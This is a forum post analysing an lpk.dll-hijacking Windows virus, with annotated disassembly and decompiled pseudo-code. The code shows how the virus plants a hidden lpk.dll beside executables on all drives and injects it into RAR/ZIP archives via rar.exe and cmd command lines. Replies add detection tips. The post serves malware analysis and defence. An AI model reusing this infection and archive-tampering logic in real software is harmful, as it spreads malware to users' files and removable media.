[原创]lpk类病毒分析
发表于: 2011-2-6 20:23 31520


lpk类病毒分析
病毒体来源http://www.52pojie.cn/thread-75591-1-1.html

除夕那天晚上我写了个 Lpk，并对 lpk 做了点研究，所以今晚再看这些代码应该会方便很多。关于 lpk 的文章请到我的 Blog 参考笔记，这里就不废话了。
我的Lpk.cpp
http://hi.baidu.com/hackernewyangjt/blog/item/a4e15a8241ccaab10df4d200.html
直接载入Lpk11.dll

.text:10001A32 ; =============== S U B R O U T I N E =======================================
.text:10001A32
.text:10001A32 ; Entry point of the analysed Lpk11.dll. Excerpt only: the branch taken when
.text:10001A32 ; fdwReason != 1 (loc_10001AA9) and the exit at loc_10001AEC are not listed.
.text:10001A32 ; Calls without the ds: prefix go to routines labelled by the analyst; their
.text:10001A32 ; bodies are not shown, so what they do is known here only from the label.
.text:10001A32 ; Every attach path in this excerpt ends in InitLpk.
.text:10001A32
.text:10001A32 ; BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
.text:10001A32                 public DllEntryPoint
.text:10001A32 DllEntryPoint   proc near
.text:10001A32
.text:10001A32 hLibModule      = dword ptr  4
.text:10001A32 fdwReason       = dword ptr  8
.text:10001A32 lpReserved      = dword ptr  0Ch
.text:10001A32
.text:10001A32                 cmp     [esp+fdwReason], 1 ; 1 = DLL_PROCESS_ATTACH
.text:10001A37                 push    esi
.text:10001A38                 jnz     short loc_10001AA9 ; any other reason: handled outside this excerpt
.text:10001A3A                 mov     esi, [esp+4+hLibModule] ; esi = module handle of this DLL
.text:10001A3E                 push    104h            ; nSize = 260 characters (MAX_PATH)
.text:10001A43                 push    offset ExistingFileName ; lpFilename: global that receives this DLL's own path
.text:10001A48                 push    esi             ; hModule
.text:10001A49                 mov     dword_10003290, esi ; module handle also kept in a global
.text:10001A4F                 call    ds:GetModuleFileNameW
.text:10001A55                 push    esi             ; hLibModule
.text:10001A56                 call    ds:DisableThreadLibraryCalls ; no thread attach/detach notifications from here on
.text:10001A5C                 call    GetMutexName    ; analyst label; body not shown
.text:10001A61                 cmp     eax, 1
.text:10001A64                 jnz     short loc_10001AA2 ; result != 1: skip everything and only call InitLpk
.text:10001A66                 call    IsVirusKernelFile ; analyst label: checks whether this copy was dropped by the malware's core process
.text:10001A6B                 test    eax, eax
.text:10001A6D                 jnz     short loc_10001A7D ; non-zero: do not drop the core again
.text:10001A6F                 call    CreateMutex     ; local routine labelled by the analyst (no ds: prefix, so not the API import)
.text:10001A74                 test    eax, eax
.text:10001A76                 jnz     short loc_10001A7D ; non-zero: skip the drop (presumably another instance holds the mutex)
.text:10001A78                 call    ExpandVirusKernel ; analyst label: presumably writes out and starts the core payload
.text:10001A7D
.text:10001A7D loc_10001A7D:                           ; CODE XREF: DllEntryPoint+3Bj
.text:10001A7D                                         ; DllEntryPoint+44j
.text:10001A7D                 call    IsCurrentFileLpk ; analyst label: presumably tests whether this file is named lpk.dll
.text:10001A82                 cmp     eax, 1
.text:10001A85                 jnz     short loc_10001AA2 ; result != 1: no infection thread
.text:10001A87                 push    0               ; lpName: unnamed event
.text:10001A89                 push    0               ; bInitialState: non-signalled
.text:10001A8B                 push    eax             ; bManualReset: eax is 1 here, so a manual-reset event
.text:10001A8C                 push    0               ; lpEventAttributes
.text:10001A8E                 call    ds:CreateEventW
.text:10001A94                 mov     hHandle, eax    ; Infect() polls this event and stops once it is signalled
.text:10001A99                 test    eax, eax
.text:10001A9B                 jz      short loc_10001AA2 ; event creation failed: no infection thread
.text:10001A9D                 call    StartInfectThraed ; analyst label (spelling as in the database): starts the spreading thread
.text:10001AA2
.text:10001AA2 loc_10001AA2:                           ; CODE XREF: DllEntryPoint+32j
.text:10001AA2                                         ; DllEntryPoint+53j ...
.text:10001AA2                 call    InitLpk         ; analyst label: presumably loads the genuine lpk.dll so the host program keeps working
.text:10001AA7                 jmp     short loc_10001AEC ; exit path, outside this excerpt
.text:10001AA9 ; ---------------------------------------------------------------------------

; lpk11.StartThread (OllyDbg listing; the excerpt ends at the CreateThread call).
; Creates the drive-enumeration thread in suspended state. The code that
; resumes the thread is not part of this excerpt.
009119E6 <lpk11.StartThread>  /$  56            push    esi
009119E7                      |.  33F6          xor     esi, esi                         ;  esi = 0, reused for every NULL/0 argument
009119E9                      |.  56            push    esi                              ; /pThreadId => NULL
009119EA                      |.  6A 04         push    4                                ; |CreationFlags = CREATE_SUSPENDED
009119EC                      |.  56            push    esi                              ; |pThreadParm => NULL
009119ED                      |.  68 D3189100   push    <FuckAllDisk>                    ; |ThreadFunction = <lpk11.FuckAllDisk>
009119F2                      |.  56            push    esi                              ; |StackSize => 0
009119F3                      |.  56            push    esi                              ; |pSecurity => NULL
009119F4                      |.  FF15 A0209100 call    dword ptr [<&KERNEL32.CreateThre>; \CreateThread
; Drive-enumeration thread (OllyDbg listing; the label is the analyst's, and the
; excerpt stops before the loop tail). For a drive number in ebx it asks
; shell32 for the drive type and, for types 2..4, creates one suspended Infect
; thread with the drive number as its parameter.
; Defender's view: one worker thread per removable, fixed or network drive means
; USB media and mapped shares are reached as well as local disks.
009118D3 <lpk11.FuckAllDisk>   .  81EC C4000000 sub     esp, 0C4
009118D9                       .  53            push    ebx
009118DA                       .  55            push    ebp
009118DB                       .  56            push    esi
009118DC                       .  57            push    edi
009118DD                       .  6A 60         push    60                               ; /Length = 60 (96.)
009118DF                       .  8D4424 78     lea     eax, dword ptr [esp+78]          ; |
009118E3                       .  50            push    eax                              ; |Destination
009118E4                       .  33FF          xor     edi, edi                         ; |
009118E6                       .  FF15 34209100 call    dword ptr [<&KERNEL32.RtlZeroMem>; \RtlZeroMemory
009118EC                       >  6A 02         push    2                                ;  first drive number = 2; Infect maps n to "A:\" + n, so 2 is C:
009118EE                       .  5B            pop     ebx                              ;  ebx = current drive number
009118EF                       .  8D6C24 74     lea     ebp, dword ptr [esp+74]          ;  ebp -> per-drive slot on the stack (exact layout not recoverable from this excerpt)
009118F3                       .  C74424 10 180>mov     dword ptr [esp+10], 18           ;  0x18 = 24; presumably the number of drives to walk (C: to Z:) - loop tail not shown
009118FB                       >  837D 00 01    cmp     dword ptr [ebp], 1               ;  slot already holds 1?
009118FF                       .  74 5B         je      short 0091195C                   ;  yes: skip this drive
00911901                       .  53            push    ebx
00911902                       .  FF15 B4209100 call    dword ptr [<&SHELL32.#64>]       ;  shell32.DriveType
00911908                       .  83C0 FE       add     eax, -2                          ;  eax = type - 2
0091190B                       .  83F8 02       cmp     eax, 2                           ;  is the drive type one that gets infected?
0091190E                       .  77 4C         ja      short 0091195C                   ;  unsigned compare: only types 2..4 pass (DRIVE_REMOVABLE, DRIVE_FIXED, DRIVE_REMOTE, assuming GetDriveType-style codes)
00911910                       .  33C0          xor     eax, eax
00911912                       .  50            push    eax                              ; /pThreadId => NULL
00911913                       .  6A 04         push    4                                ; |CreationFlags = CREATE_SUSPENDED
00911915                       .  53            push    ebx                              ; |pThreadParm = drive number
00911916                       .  68 77169100   push    <Infect>                         ; |ThreadFunction = <lpk11.Infect>
0091191B                       .  50            push    eax                              ; |StackSize => 0
0091191C                       .  50            push    eax                              ; |pSecurity => NULL
0091191D                       .  FF15 A0209100 call    dword ptr [<&KERNEL32.CreateThre>; \CreateThread
// Hex-Rays pseudo-code of the per-directory spreading routine. The listing is
// cut off inside the loop, so only the handling of regular files is visible.
//
// lpString1 is either a drive number (values below 0x100) or a pointer to a
// directory path. For every .EXE found, the DLL's own file (ExistingFileName)
// is copied into the same directory as "lpk.dll" with the read-only, hidden
// and system attributes set; .RAR/.ZIP files under 50 MiB are handed to
// InfectCompressFile.
//
// Defender's view: a file named lpk.dll with attributes R+H+S sitting next to
// executables outside the Windows system directory is the artefact this code
// leaves behind. A copy placed there can be loaded ahead of the system
// lpk.dll when a program is started from that directory (DLL search order).
//
// Returns 0 when the stop event is signalled, 1 when the directory cannot be
// enumerated; the remaining return paths are outside the excerpt.
signed int __stdcall Infect(LPCWSTR lpString1)
{
  const WCHAR *v2; // eax@17
  struct _WIN32_FIND_DATAW FindFileData; // [sp+4h] [bp-668h]@6
  WCHAR String2; // [sp+254h] [bp-418h]@4 -- really a buffer: 0x208 bytes (260 WCHARs) lie between it and FileName
  WCHAR FileName; // [sp+45Ch] [bp-210h]@6 -- likewise a 0x208-byte buffer, not a single character
  HANDLE hFindFile; // [sp+664h] [bp-8h]@6
  int v7; // [sp+668h] [bp-4h]@1
  const WCHAR *v8; // [sp+674h] [bp+8h]@17
  v7 = 1;
  // 258 is WAIT_TIMEOUT: work continues only while the event created in
  // DllEntryPoint is still non-signalled.
  if ( WaitForSingleObject(hHandle, 0) != 258 )
    return 0;
  if ( (unsigned int)lpString1 >= 0x100 )
  {
    // Treated as a pointer to a path. lstrcpyW is unbounded; the destination
    // holds 260 WCHARs.
    lstrcpyW(&String2, lpString1);
  }
  else
  {
    // Treated as a drive number: start from "A:\" and advance the drive
    // letter by that number (the += acts on the first character).
    lstrcpyW(&String2, L"A:\\");
    String2 += (unsigned __int16)lpString1;
  }
  lstrcpyW(&FileName, &String2);               // keep the bare directory
  PathAppendW(&String2, &word_10002374);       // search pattern; its text is not shown (presumably a wildcard)
  hFindFile = FindFirstFileW(&String2, &FindFileData);
  if ( hFindFile == (HANDLE)-1 )               // INVALID_HANDLE_VALUE
    return 1;
  lstrcpyW(&String2, &FileName);               // String2 = bare directory again
  while ( 1 )
  {
    if ( !lstrcmpiW(FindFileData.cFileName, L".") || !lstrcmpiW(FindFileData.cFileName, L"..") 
)
      goto LABEL_27;
    if ( FindFileData.dwFileAttributes & 0x10 ) // FILE_ATTRIBUTE_DIRECTORY: handled after the loop, outside this excerpt
      break;
    v2 = PathFindExtensionW(FindFileData.cFileName);
    v8 = v2;
    if ( v2 )
    {
      if ( !lstrcmpiW(v2, L".EXE") )            // an .exe in this directory: copy lpk.dll next to it
      {
        lstrcpyW(&FileName, &String2);
        PathAppendW(&FileName, L"lpk.dll");
        if ( GetFileAttributesW(&FileName) != -1 ) // an lpk.dll already exists here: leave it alone
          goto LABEL_27;
        CopyFileW(&ExistingFileName, &FileName, 1); // bFailIfExists = TRUE; result is not checked
        SetFileAttributesW(&FileName, 7u);          // 7 = READONLY | HIDDEN | SYSTEM
      }
      if ( !lstrcmpiW(v8, L".RAR") || !lstrcmpiW(v8, L".ZIP") )// archive infection path
      {
        if ( !FindFileData.nFileSizeHigh )
        {
          if ( FindFileData.nFileSizeLow < 0x3200000 ) // only archives smaller than 50 MiB
          {
            lstrcpyW(&FileName, &String2);
            PathAppendW(&FileName, FindFileData.cFileName);
            InfectCompressFile(&FileName);
          }
        }
      }
    }
// NOTE(review): the listing ends here. LABEL_27, the step to the next directory
// entry and the code reached by the directory `break` are not reproduced.
// Hex-Rays pseudo-code of the archive path: adds lpk.dll to a .RAR/.ZIP file by
// driving the locally installed WinRAR command-line tool.
//
// a1 is declared int by the decompiler but is used as the wide-string path of
// the archive (it is passed to %s). UpdatePackage and PathGetShortPath are
// helpers whose bodies are not shown; from the call sites UpdatePackage takes
// a command line and a number that looks like a timeout in milliseconds.
//
// Sequence visible below:
//   1. read HKCR\WinRAR\shell\open\command and derive <WinRAR dir>\rar.exe;
//   2. list the archive and filter for "lpk.dll";
//   3. extract *.exe into a temporary directory, run Infect() on it;
//   4. add <temp>\lpk.dll to the archive, then delete the temporary directory.
//
// Defender's view: the observable trail is a non-WinRAR process reading that
// registry key and then spawning cmd.exe / rar.exe with the `vb`, `x ... *.exe`
// and `a -r -ep1` command lines shown here, plus a short-lived directory under
// %TEMP%. Archives that contain both executables and an lpk.dll entry are the
// resulting artefact.
//
// Returns the result of the last API or helper call made (0 is also returned
// when the registry read succeeds but no delimiter is found).
DWORD __cdecl InfectCompressFile(int a1)
{
  DWORD result; // eax@1
  wchar_t v2[2]; // eax@3 -- decompiler artefact: holds a pointer to the delimiter string
  UINT v3; // eax@6
  WCHAR CommandLine; // [sp+0h] [bp-824h]@6 -- buffer, 0x410 bytes (520 WCHARs) up to PathName
  WCHAR PathName; // [sp+410h] [bp-414h]@6 -- buffer, 0x208 bytes (260 WCHARs) up to FileName
  WCHAR FileName; // [sp+618h] [bp-20Ch]@1 -- buffer that receives the registry string
  const WCHAR String2; // [sp+61Ah] [bp-20Ah]@3 -- two bytes after FileName, i.e. FileName[1]
  int v8; // [sp+820h] [bp-4h]@1
  v8 = 520;                                     // size of FileName in bytes
  // Flag 2 is SRRF_RT_REG_SZ: only a string value is accepted.
  result = SHRegGetValueW(HKEY_CLASSES_ROOT, L"WinRAR\\shell\\open\\command", 0, 2, 0, 
&FileName, &v8);
  if ( !result )                                // 0 = success, so WinRAR is registered
  {
    if ( FileName == 34 )                       // 34 = '"': the command starts with a quoted path
    {
      lstrcpyW(&FileName, &String2);            // shift left by one character to drop the opening quote
      *(_DWORD *)v2 = L"\"";                    // the path ends at the closing quote
    }
    else
    {
      *(_DWORD *)v2 = L" ";                     // unquoted: the path ends at the first space
    }
    result = StrStrIW(&FileName, *(_DWORD *)v2);
    if ( result )
    {
      *(_WORD *)result = 0;                     // cut the string at the delimiter: FileName = WinRAR executable
      PathRemoveFileSpecW(&FileName);           // keep only its directory
      PathAppendW(&FileName, L"rar.exe");       // console version shipped with WinRAR
      result = GetFileAttributesW(&FileName);
      if ( result != -1 )                       // rar.exe exists
      {
        PathGetShortPath(&FileName);            // helper not shown; presumably converts to an 8.3 path, since the first command uses it unquoted
        GetTempPathW(MAX_PATH, &PathName);
        v3 = GetCurrentThreadId();
        // With a non-zero uUnique the API only builds a name and creates no
        // file. GetTempFileNameW uses at most three characters of the prefix,
        // so the name should start with "IRA" followed by the thread id in hex.
        GetTempFileNameW(&PathName, L"IRAR", v3, &PathName);
        // Step 2: bare listing of the archive, filtered for lpk.dll. The
        // format string has two %s, so the third argument (PathName) is unused.
        ((void (__cdecl *)(WCHAR *, _DWORD, WCHAR *, int, WCHAR *))wsprintfW)(
          &CommandLine,
          L"cmd /c %s vb \"%s\" lpk.dll|find /i \"lpk.dll\"",
          &FileName,
          a1,
          &PathName);
        // NOTE(review): _MAX_WAIT_MALLOC_CRT is a CRT constant the decompiler
        // matched to the number (60000 in the MSVC headers) - confirm.
        result = UpdatePackage(&CommandLine, _MAX_WAIT_MALLOC_CRT);
        if ( result )                           // presumably: archive does not contain lpk.dll yet - helper semantics not shown
        {
          // Step 3: extract the executables into the temporary directory.
          wsprintfW(&CommandLine, L"\"%s\" x \"%s\" *.exe \"%s\\\"", &FileName, a1, 
&PathName);
          UpdatePackage(&CommandLine, 0x1D4C0u); // 0x1D4C0 = 120000
          Infect(&PathName);                    // pointer >= 0x100, so Infect takes its path branch
          // Step 4: add <temp>\lpk.dll to the archive (-ep1 drops the temp directory from the stored name).
          wsprintfW(&CommandLine, L"\"%s\" a -r -ep1\"%s\" \"%s\" \"%s\\lpk.dll\"", &FileName, 
&PathName, a1, &PathName);
          UpdatePackage(&CommandLine, 0x3A980u); // 0x3A980 = 240000
          // Clean-up: remove the temporary directory and everything in it.
          wsprintfW(&CommandLine, L"cmd /c RD /s /q \"%s\"", &PathName);
          result = UpdatePackage(&CommandLine, _MAX_WAIT_MALLOC_CRT);
        }
      }
    }
  }
  return result;
}
FF 05 00 00 AF 00 A1 00 00 AF 00 6B C0 12 8D 80 3C 36 40 00 FF E0 FF 25 70 62 40 00 51 52 68 E0 8D 40 00 E9 00 00 00 00 68 78 69 40 00 E8 EE 02 00 00 5A 59 EB CA

最新回复 (7)
前排。。。      。
2011-2-6 21:41
不错呀~
2011-2-6 22:11
最近我也在关注这个病毒,加上你这个样本我已经收集3个不同的版本了,通过分析,这应该是个有具体团队或者个人持续更新的国产傀儡网络木马病毒,主要功能是对指定目标进行DDOS攻击,当然也有远程下载并运行的功能。3个版本拥有同样的dropper和字串加密解密算法(但key值有变化),程序稍有更新,最原始的版本甚至完全没有加壳。顺便在你的查杀方法上补充一下,这个病毒会在%system32%里生成hra??.dll(??代表2个随机数字)。有兴趣可以跟我继续交流。

ps:头像变漂亮了啊,呵呵
2012-3-30 03:10
请查看一下你的临时文件夹 好像里面也有的。。。。。
2012-3-30 10:15
顶一下CG图,看画风是樋上いたる 吧,是LittleBuster里的吗,怎么没印象
2012-3-30 10:21
来围观一下吧..
2012-9-6 16:33
lpk风靡了一阵子
现在风光不再了~
2013-4-3 00:19